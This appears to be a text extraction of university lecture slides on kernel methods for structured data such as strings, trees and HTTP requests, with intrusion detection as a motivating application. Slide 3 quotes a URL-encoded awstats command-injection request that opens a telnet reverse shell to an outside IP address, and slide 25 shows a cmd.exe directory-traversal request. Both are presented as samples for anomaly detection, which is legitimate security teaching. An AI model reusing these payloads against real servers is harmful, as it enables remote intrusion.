Lecture 9 - Universität Tübingen

Transcription

Lecture 9 - Universität Tübingen
Lecture 9
Kernel Methods for Structured Inputs
Pavel Laskov1
Blaine Nelson1
1
Cognitive Systems Group
Wilhelm Schickard Institute for Computer Science
Universität Tübingen, Germany
Advanced Topics in Machine Learning, 2012
P. Laskov and B. Nelson
(Tübingen)
Lecture 9: Learning with Structured Inputs
July 3, 2012
1 / 30
What We Have Learned So Far
∗
r
∗
∗c
Learning problems are defined in terms of kernel functions reflecting the
geometry of training data.
What if the data does not naturally belong to inner product spaces?
P. Laskov and B. Nelson
(Tübingen)
Lecture 9: Learning with Structured Inputs
July 3, 2012
2 / 30
Example: Intrusion Detection
> GET / HTTP/1.1\x0d\x0aAccept: */*\x0d\x0aAccept-Language: en\x0d
\x0aAccept-Encoding: gzip, deflate\x0d\x0aCookie: POPUPCHECK=11
50521721386\x0d\x0aUser-Agent: Mozilla/5.0 (Macintosh; U; Intel
Mac OS X; en) AppleWebKit/418 (KHTML, like Gecko) Safari/417.9.3\x0d
\x0aConnection: keep-alive\x0d\x0aHost: www.spiegel.de\x0d\x0a
\x0d\x0a
> GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;sleep%207200%7ct
elnet%20194%2e95%2e173%2e219%204321%7cwhile%20%3a%20%3b%20do%20sh%
20%26%26%20break%3b%20done%202%3e%261%7ctelnet%20194%2e95%2e173%2e
219%204321;echo%20YYY;echo| HTTP/1.1\x0d\x0aAccept: */*\x0d\x0a
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\x0d
\x0aHost: wuppi.dyndns.org:80\x0d\x0aConnection: Close\x0d\x0a
\x0d\x0a
> GET /Images/200606/tscreen2.gif HTTP/1.1\x0d\x0aAccept: */*\x0d\x0a
Accept-Language: en\x0d\x0aAccept-Encoding: gzip, deflate\x0d\x0a
Cookie: .ASPXANONYMOUS=AcaruKtUwo5mMjliZjIxZC1kYzI1LTQyYzQtYTMyNy0
3YWI2MjlkMjhiZGQ1; CommunityServer-UserCookie1001=lv=5/16/2006 12:
27:01 PM&mra=5/17/2006 9:02:37 AM\x0d\x0aUser-Agent: Mozilla/5.0
(Macintosh; U; Intel Mac OS X; en) AppleWebKit/418 (KHTML, like G
ecko) Safari/417.9.3\x0d\x0aConnection: keep-alive\x0d\x0aHost
: www.thedailywtf.com\x0d\x0a\x0d\x0a
P. Laskov and B. Nelson
(Tübingen)
Lecture 9: Learning with Structured Inputs
July 3, 2012
3 / 30
Examples of Structured Input Data
Histograms
Strings
Graphs
Trees
S
S
1.
NP
2.
N
VP
4.
NP
V
D
Jeff
1.
NP
3.
5.
N
ate
the
2.
N
4.
3.
NP
V
D
John
hit
the
apple
P. Laskov and B. Nelson
VP
(Tübingen)
5.
A
red
N
car
Lecture 9: Learning with Structured Inputs
July 3, 2012
4 / 30
Convolution Kernels in a Nutshell
Decompose structured objects into comparable parts.
Aggregate the values of similarity measures for individual parts.
P. Laskov and B. Nelson
(Tübingen)
Lecture 9: Learning with Structured Inputs
July 3, 2012
5 / 30
R-Convolution
Let X be a set of composite objects (e.g., cars), and X̄1 , . . . , X̄D be sets
of parts (e.g., wheels, brakes, etc.). All sets are assumed countable.
Let R denote the relation “being part of”:
R(x̄1 , . . . , x̄D , x) = 1, iff x̄1 , . . . , x̄D are parts of x
The inverse relation R −1 is defined as:
R −1 (x) = {x̄ : R(x̄, x) = 1}
In other words, for each object x, R −1 (x) is a set of component subsets,
that are part of x.
We say that R is finite, if R −1 is finite for all x ∈ X .
P. Laskov and B. Nelson
(Tübingen)
Lecture 9: Learning with Structured Inputs
July 3, 2012
6 / 30
R-Convolution: A Naive Example
P. Laskov and B. Nelson
(Tübingen)
Lecture 9: Learning with Structured Inputs
July 3, 2012
7 / 30
R-Convolution: A Naive Example
Alfa Romeo Junior
Lada Niva
wheels
headlights
bumpers
transmission
differential
tow coupling
...
P. Laskov and B. Nelson
(Tübingen)
Lecture 9: Learning with Structured Inputs
July 3, 2012
7 / 30
R-Convolution: Further Examples
Let x be a D-tuple in X = X1 × . . . × XD . Let each of the D
components of x ∈ X be a part of x. Then R(x̄, x) = 1 iff x̄ = x.
P. Laskov and B. Nelson
(Tübingen)
Lecture 9: Learning with Structured Inputs
July 3, 2012
8 / 30
R-Convolution: Further Examples
Let x be a D-tuple in X = X1 × . . . × XD . Let each of the D
components of x ∈ X be a part of x. Then R(x̄, x) = 1 iff x̄ = x.
Let X1 = X2 = X be sets of all finite strings over a finite alphabet.
Define R(x̄1 , x̄2 , x) = 1 iff x = x1 ◦ x2 , i.e. concatenation of x1 and x2 .
P. Laskov and B. Nelson
(Tübingen)
Lecture 9: Learning with Structured Inputs
July 3, 2012
8 / 30
R-Convolution: Further Examples
Let x be a D-tuple in X = X1 × . . . × XD . Let each of the D
components of x ∈ X be a part of x. Then R(x̄, x) = 1 iff x̄ = x.
Let X1 = X2 = X be sets of all finite strings over a finite alphabet.
Define R(x̄1 , x̄2 , x) = 1 iff x = x1 ◦ x2 , i.e. concatenation of x1 and x2 .
Let X1 = . . . = XD = X be a set of D-degree ordered and rooted trees.
Define R(x̄, x) = 1 iff x̄1 , . . . , x̄D are D subtrees of the root of x ∈ X .
P. Laskov and B. Nelson
(Tübingen)
Lecture 9: Learning with Structured Inputs
July 3, 2012
8 / 30
R-Convolution Kernel
Definition
Let x, y ∈ X and x̄ and ȳ be the corresponding sets of parts. Let
Kd (x̄d , ȳd ) be a kernel between the d-th parts of x and y (1 ≤ d ≤ D).
Then the convolution kernel between x and y is defined as:
K (x, y ) =
X
x̄∈R −1 (x)
P. Laskov and B. Nelson
(Tübingen)
X
ȳ∈R −1 (y )
D
Y
Kd (xd , yd )
d=1
Lecture 9: Learning with Structured Inputs
July 3, 2012
9 / 30
Examples of R-Convolution Kernels
RBF kernel is a convolution kernel. Let each of the D dimensions of x
2
2
be a part, and Kd (xd , yd ) = e −(xd −yd ) /2σ . Then
K (x, y ) =
D
Y
2 /2σ 2
e −(xd −yd )
= e−
PD
2
2
d=1 (xd −yd ) /2σ
= e−
||x−y||2
2σ 2
d=1
P. Laskov and B. Nelson
(Tübingen)
Lecture 9: Learning with Structured Inputs
July 3, 2012
10 / 30
Examples of R-Convolution Kernels
RBF kernel is a convolution kernel. Let each of the D dimensions of x
2
2
be a part, and Kd (xd , yd ) = e −(xd −yd ) /2σ . Then
K (x, y ) =
D
Y
2 /2σ 2
e −(xd −yd )
= e−
PD
2
2
d=1 (xd −yd ) /2σ
= e−
||x−y||2
2σ 2
d=1
P
Linear kernel K (x, y ) = D
d=1 xd yd is not a convolution kernel, except
for the trivial “single part” decomposition. For any other decomposition,
we would need to sum products of more than one term, which
contradicts the formula for the linear kernel.
P. Laskov and B. Nelson
(Tübingen)
Lecture 9: Learning with Structured Inputs
July 3, 2012
10 / 30
Subset Product Kernel
Theorem
Let K be a kernel on a set U × U. The for all finite, non-empty subsets
A, B ⊆ U,
XX
K ′ (A, B) =
K (x, y )
x∈A y ∈B
is a valid kernel.
P. Laskov and B. Nelson
(Tübingen)
Lecture 9: Learning with Structured Inputs
July 3, 2012
11 / 30
Subset Product Kernel
Proof.
Goal: show that K ′ (A, B) is an inner product in some space...
Recall that for
U, K (u, ·) is a function Ku in some RKHS
Pany point u ∈ P
H. Let fA = u∈A Ku , fB = u∈B Ku . Define
hfA , fB i :=
XX
K (x, y )
x∈A y ∈B
We need
P to show that it satisfies properties of an inner product... Let
fC = u∈C Ku . Clearly,
hfA + fC , fB i =
X X
x∈A∪C y ∈B
K (x, y ) =
XX
K (x, y ) +
x∈A y ∈B
XX
K (x, y )
x∈C y ∈B
Other properties of the inner product can be proved similarly.
P. Laskov and B. Nelson
(Tübingen)
Lecture 9: Learning with Structured Inputs
July 3, 2012
11 / 30
Back to the R-Convolution Kernel
Theorem
K (x, y ) =
X
x̄∈R −1 (x)
X
ȳ∈R −1 (y )
D
Y
Kd (xd , yd )
d=1
is a valid kernel.
P. Laskov and B. Nelson
(Tübingen)
Lecture 9: Learning with Structured Inputs
July 3, 2012
12 / 30
Back to the R-Convolution Kernel
Proof.
Let U = X1 × . . . × XD . From the closure of kernels under the tensor
product, it follows that
K̃ (x̄, ȳ) =
D
Y
Kd (xd , yd )
d=1
is a kernel on U × U. Applying the Subset Product Kernel Theorem for
A = R −1 (x), B = R −1 (y ), the theorem’s claim follows.
P. Laskov and B. Nelson
(Tübingen)
Lecture 9: Learning with Structured Inputs
July 3, 2012
12 / 30
End of Theory ,
P. Laskov and B. Nelson
(Tübingen)
Lecture 9: Learning with Structured Inputs
July 3, 2012
13 / 30
Convolution Kernels for Strings
Let x, y ∈ A∗ be two strings generated from the alphabet A. How can we
define K (x, y ) using the ideas of convolution kernels?
P. Laskov and B. Nelson
(Tübingen)
Lecture 9: Learning with Structured Inputs
July 3, 2012
14 / 30
Convolution Kernels for Strings
Let x, y ∈ A∗ be two strings generated from the alphabet A. How can we
define K (x, y ) using the ideas of convolution kernels?
Let D = 1, take X1 to be the set of all possible strings of length n
(“n-grams”) generated from the alphabet A. |X1 | = |A|n .
For any x ∈ A∗ and any x̄ ∈ X1 , define R(x̄, x) = 1 iff x̄ ⊆ x.
Then R −1 (x) is a set of all n-grams contained in x.
Define K (x̄, ȳ ) = 1[x̄=ȳ ] .
P. Laskov and B. Nelson
(Tübingen)
Lecture 9: Learning with Structured Inputs
July 3, 2012
14 / 30
Convolution Kernels for Strings
Let x, y ∈ A∗ be two strings generated from the alphabet A. How can we
define K (x, y ) using the ideas of convolution kernels?
Let D = 1, take X1 to be the set of all possible strings of length n
(“n-grams”) generated from the alphabet A. |X1 | = |A|n .
For any x ∈ A∗ and any x̄ ∈ X1 , define R(x̄, x) = 1 iff x̄ ⊆ x.
Then R −1 (x) is a set of all n-grams contained in x.
Define K (x̄, ȳ ) = 1[x̄=ȳ ] .
K (x, y ) =
X
x̄∈R −1 (x)
P. Laskov and B. Nelson
(Tübingen)
X
1[x̄=ȳ ]
ȳ ∈R −1 (y )
Lecture 9: Learning with Structured Inputs
July 3, 2012
14 / 30
Convolution Kernels for Strings (ctd.)
An alternative definition of a kernel for two strings can be obtained as
follows:
Let D = 1, take X1 to be the set of all possible strings of arbitrary
length generated from the alphabet A. |X1 | = ∞.
For any x ∈ A∗ and any x̄ ∈ X1 , define R(x̄, x) = 1 iff x̄ ⊆ x.
Then R −1 (x) is a set of all n-grams contained in x.
Define K (x̄, ȳ ) = 1[x̄=ȳ ] .
K (x, y ) =
X
x̄∈R −1 (x)
X
1[x̄=ȳ ]
ȳ ∈R −1 (y )
Notice that the size of the summation remains finite despite the infinite
dimensionality of X1 .
P. Laskov and B. Nelson
(Tübingen)
Lecture 9: Learning with Structured Inputs
July 3, 2012
15 / 30
Geometry of String Kernels
Sequences
1. blabla blubla blablabu aa
2. bla blablaa bulab bb abla
Subsequences
3. a blabla blabla ablub bla
Histograms of subsequences
4. blab blab abba blabla blu
1.
2.
3.
Geometry
Features
4.
blablabu
blablaa
blablu
blabla
bulab
ablub
blab
abla
abba
blu
P. Laskov and B. Nelson
bla
1
3
bb
aa
b
a
2
4
(Tübingen)
Lecture 9: Learning with Structured Inputs
July 3, 2012
16 / 30
Metric Embedding of Strings
Define the language S ⊆ A∗ of possible
features, e.g., n-grams, words, all
subsequences.
For each sequence x, count occurrences of
each feature in it:
φ : x −→ (φs (x))s∈S
Use φs (x) as the s-th coordinate of x in the
vector space of dimensionality |S|.
Define K (x, y ) := hφs (x), φs (y )i. This is equivalent to K (x, y ) defined
by the convolution kernel!
P. Laskov and B. Nelson
(Tübingen)
Lecture 9: Learning with Structured Inputs
July 3, 2012
17 / 30
Similarity Measure for Embedded Strings
Metric embedding enables application of various vectorial similarity
measures over sequences, e.g.
K (x, y )
Kernels
Linear
RBF
P
φs (x)φs (y )
s∈S
exp(d(x, y )2 /σ)
Manhattan
(Tübingen)
|φs (x) − φs (y )|
s∈S
Minkowski
Hamming
P
Chebyshev
Jaccard, Kulczynski, . . .
P
rP
Similarity coefficients
P. Laskov and B. Nelson
d(x, y )
Distances
k
|φs (x) − φs (y )|k
s∈S
sgn |φs (x) − φs (y )|
s∈S
max|φs (x) − φs (y )|
s∈S
Lecture 9: Learning with Structured Inputs
July 3, 2012
18 / 30
Embedding example
X = abrakadabra
Y = barakobama
P. Laskov and B. Nelson
(Tübingen)
Lecture 9: Learning with Structured Inputs
July 3, 2012
19 / 30
Embedding example
X = abrakadabra
Y = barakobama
X
a/5
b/2
d/1
k/1
Y
a/4
b/2
X ·Y
20
4
k/1
1
m/1
o/1
r/2
r/1
2
5.92 4.90
27
∠ XY = 21.5◦
P. Laskov and B. Nelson
(Tübingen)
Lecture 9: Learning with Structured Inputs
July 3, 2012
19 / 30
Embedding example
X = abrakadabra
Y = barakobama
X
a/5
b/2
d/1
k/1
Y
a/4
b/2
X ·Y
20
4
k/1
1
m/1
o/1
r/2
r/1
2
5.92 4.90
27
∠ XY = 21.5◦
X
ab/2
ad/1
ak/1
Y
X ·Y
ak/1
am/1
ar/1
ba/2
1
br/2
da/1
ka/1
ko/1
ma/1
ob/1
ra/2
ra/1
2
4.00
3.46
3
∠ XY = 77.5◦
P. Laskov and B. Nelson
(Tübingen)
Lecture 9: Learning with Structured Inputs
July 3, 2012
19 / 30
Implementation of String Kernels
General observations
Embedding space has huge dimensionality but is very sparse; at most
linear number of entries are different from zero in each sample.
Computation of similarity measures requires operations on either the
intersection or the union of the set of non-zero features in each sample.
P. Laskov and B. Nelson
(Tübingen)
Lecture 9: Learning with Structured Inputs
July 3, 2012
20 / 30
Implementation of String Kernels
General observations
Embedding space has huge dimensionality but is very sparse; at most
linear number of entries are different from zero in each sample.
Computation of similarity measures requires operations on either the
intersection or the union of the set of non-zero features in each sample.
Implementation strategies
Explicit but sparse representation of feature vectors
⇒ sorted arrays or hash tables
Implicit and general representations
⇒ tries, suffix trees, suffix arrays
P. Laskov and B. Nelson
(Tübingen)
Lecture 9: Learning with Structured Inputs
July 3, 2012
20 / 30
String Kernels using Sorted Arrays
Store all features in sorted arrays
Traverse feature arrays of two samples to find mathing elements
φ(x)
aa (3)
ab (2)
bc (2)
cc (1)
φ(z)
ab (3)
ba (2)
bb (1)
bc (4)
Running time:
Sorting: O(n)
Comparison: O(n)
P. Laskov and B. Nelson
(Tübingen)
Lecture 9: Learning with Structured Inputs
July 3, 2012
21 / 30
String Kernels using Generalized Suffix Trees
2-grams
aa
ab
ba
bb
“abbaa”
“abbaa” · “baaaa” = 0
“baaaa”
6 6
a
#
$
b
3 4
a
#
2 1
a
aa baa#
$ bbaa#
1 3
1 1
#
$
aa$
#
0 2
a$
$
P. Laskov and B. Nelson
(Tübingen)
Lecture 9: Learning with Structured Inputs
July 3, 2012
22 / 30
String Kernels using Generalized Suffix Trees
2-grams
aa
ab
ba
bb
“abbaa”
1
“abbaa” · “baaaa” = 3
“baaaa”
3
6 6
a
#
$
b
3 4
a
#
2 1
a
aa baa#
$ bbaa#
1 3
1 1
#
$
aa$
#
0 2
a$
$
P. Laskov and B. Nelson
(Tübingen)
Lecture 9: Learning with Structured Inputs
July 3, 2012
22 / 30
String Kernels using Generalized Suffix Trees
2-grams
aa
ab
ba
bb
“abbaa”
1
1
“abbaa” · “baaaa” = 3
“baaaa”
3
0
6 6
a
#
$
b
3 4
a
#
2 1
a
aa baa#
$ bbaa#
1 3
1 1
#
$
aa$
#
0 2
a$
$
P. Laskov and B. Nelson
(Tübingen)
Lecture 9: Learning with Structured Inputs
July 3, 2012
22 / 30
String Kernels using Generalized Suffix Trees
2-grams
aa
ab
ba
bb
“abbaa”
1
1
1
“abbaa” · “baaaa” = 4
“baaaa”
3
0
1
6 6
a
#
$
b
3 4
a
#
2 1
a
aa baa#
$ bbaa#
1 3
1 1
#
$
aa$
#
0 2
a$
$
P. Laskov and B. Nelson
(Tübingen)
Lecture 9: Learning with Structured Inputs
July 3, 2012
22 / 30
String Kernels using Generalized Suffix Trees
2-grams
aa
ab
ba
bb
“abbaa”
1
1
1
1
“abbaa” · “baaaa” = 4
“baaaa”
3
0
1
0
6 6
a
#
$
b
3 4
a
#
2 1
a
aa baa#
$ bbaa#
1 3
1 1
#
$
aa$
#
0 2
a$
$
P. Laskov and B. Nelson
(Tübingen)
Lecture 9: Learning with Structured Inputs
July 3, 2012
22 / 30
Tree Kernels: Motivation
Trees are ubiquitous representations in various applications:
Parsing: parse trees
Content representation: XML, DOM
Bioinformatics: philogeny
Ad-hoc features related to trees, e.g. number of nodes or edges, are not
informative for learning
Structural properties of trees, on the other hand, may be very
discriminative
P. Laskov and B. Nelson
(Tübingen)
Lecture 9: Learning with Structured Inputs
July 3, 2012
23 / 30
Example: Normal HTTP Request
GET /test.gif HTTP/1.1<NL> Accept: */*<NL> Accept-Language: en<NL>
Referer: http://host/<NL> Connection: keep-alive<NL>
<httpSession>
<request>
<method>
<uri>
<version>
GET
<path>
HTTP/1.1
<reqhdr>
/test.gif
<hdr>1
<hdr>2
<hdr>3
<hdrkey> <hdrval>
<hdrkey> <hdrval>
<hdrkey> <hdrval>
Accept:
P. Laskov and B. Nelson
(Tübingen)
*/*
Referer: http://host Connection: keep-alive
Lecture 9: Learning with Structured Inputs
July 3, 2012
24 / 30
Example: Malicious HTTP Request
GET /scripts/..%%35c../cmd.exe?/c+dir+c:\ HTTP/1.0
<httpSession>
<request>
<method>
GET
<uri>
<version>
HTTP/1.0
<path>
<getparamlist>
/scripts/..%%35c../.../cmd.exe? <getparam>
<getkey>
/c+dir+c:\
P. Laskov and B. Nelson
(Tübingen)
Lecture 9: Learning with Structured Inputs
July 3, 2012
25 / 30
Convolution Kernels for Trees
Similar to strings, we can define kernels for trees using the convolution
kernel framework:
Let D = 1, X1 = X be sets of all trees. |X1 | = |X | = ∞.
For any x ∈ X and any x̄ ∈ X1 , define R(x̄, x) = 1 iff x̄ ⊆ x
⇒ x̄ is a subtree of x
Then R −1 (x) is a set of all subtrees contained in x.
Define K (x̄, ȳ ) = 1[x̄=ȳ ] .
K (x, y ) =
X
X
1[x̄=ȳ]
x̄∈R −1 (x) ȳ ∈R −1 (y )
P. Laskov and B. Nelson
(Tübingen)
Lecture 9: Learning with Structured Inputs
July 3, 2012
26 / 30
Convolution Kernels for Trees
Similar to strings, we can define kernels for trees using the convolution
kernel framework:
Let D = 1, X1 = X be sets of all trees. |X1 | = |X | = ∞.
For any x ∈ X and any x̄ ∈ X1 , define R(x̄, x) = 1 iff x̄ ⊆ x
⇒ x̄ is a subtree of x
Then R −1 (x) is a set of all subtrees contained in x.
Define K (x̄, ȳ ) = 1[x̄=ȳ ] .
K (x, y ) =
X
X
1[x̄=ȳ]
x̄∈R −1 (x) ȳ ∈R −1 (y )
/ Problem: Testing for equality between two trees may be extremely
costly!
P. Laskov and B. Nelson
(Tübingen)
Lecture 9: Learning with Structured Inputs
July 3, 2012
26 / 30
Recursive Computation of Tree Kernels
Two useful facts:
Transitivity of a subtree relationship: x̄ ⊆ x̂ & x̂ ⊆ x ⇒ x̄ ⊆ x
Necessary condition for equality: two trees are equal only if all of their
subtrees are equal.
P. Laskov and B. Nelson
(Tübingen)
Lecture 9: Learning with Structured Inputs
July 3, 2012
27 / 30
Recursive Computation of Tree Kernels
Two useful facts:
Transitivity of a subtree relationship: x̄ ⊆ x̂ & x̂ ⊆ x ⇒ x̄ ⊆ x
Necessary condition for equality: two trees are equal only if all of their
subtrees are equal.
Recursive scheme
Let Ch(x̄) denote the set of immediate children of the root of (sub)tree x̄.
|x̄| := |Ch(x̄)|.
If Ch(x̄) 6= Ch(ȳ ) return 0.
If |x̄| = |ȳ |, return 1.
Otherwise return
K (x̄, ȳ ) =
|x̄|
Y
(1 + K (x̄i , ȳi ))
i =1
P. Laskov and B. Nelson
(Tübingen)
Lecture 9: Learning with Structured Inputs
July 3, 2012
27 / 30
Computation of Recursive Clause
Find a pair of nodes with identical subsets of children.
P. Laskov and B. Nelson
(Tübingen)
Lecture 9: Learning with Structured Inputs
July 3, 2012
28 / 30
Computation of Recursive Clause
Find a pair of nodes with identical subsets of children.
Add one for the nodes themselves (subtrees of cardinality 1).
P. Laskov and B. Nelson
(Tübingen)
Lecture 9: Learning with Structured Inputs
July 3, 2012
28 / 30
Computation of Recursive Clause
Find a pair of nodes with identical subsets of children.
Add one for the nodes themselves (subtrees of cardinality 1).
Add counts for all mathing subtrees.
P. Laskov and B. Nelson
(Tübingen)
Lecture 9: Learning with Structured Inputs
July 3, 2012
28 / 30
Computation of Recursive Clause
Find a pair of nodes with identical subsets of children.
Add one for the nodes themselves (subtrees of cardinality 1).
Add counts for all mathing subtrees.
Multiply together and return the total count.
P. Laskov and B. Nelson
(Tübingen)
Lecture 9: Learning with Structured Inputs
July 3, 2012
28 / 30
Summary
Kernels for structured data extend learning methods to a vast variety of
practical data types.
A generic framework for handling structured data is offered by
convolution kernels.
Special data structures and algorithms are needed for efficiency.
Extensive range of applications:
natural language processing
bioinformatics
computer security
P. Laskov and B. Nelson
(Tübingen)
Lecture 9: Learning with Structured Inputs
July 3, 2012
29 / 30
Bibliography I
[1] M. Collins and N. Duffy. Convolution kernel for natural language. In
Advances in Neural Information Proccessing Systems (NIPS), volume 16,
pages 625–632, 2002.
[2] D. Haussler. Convolution kernels on discrete structures. Technical Report
UCSC-CRL-99-10, UC Santa Cruz, July 1999.
[3] K. Rieck and P. Laskov. Linear-time computation of similarity measures for
sequential data. Journal of Machine Learning Research, 9:23–48, 2008.
P. Laskov and B. Nelson
(Tübingen)
Lecture 9: Learning with Structured Inputs
July 3, 2012
30 / 30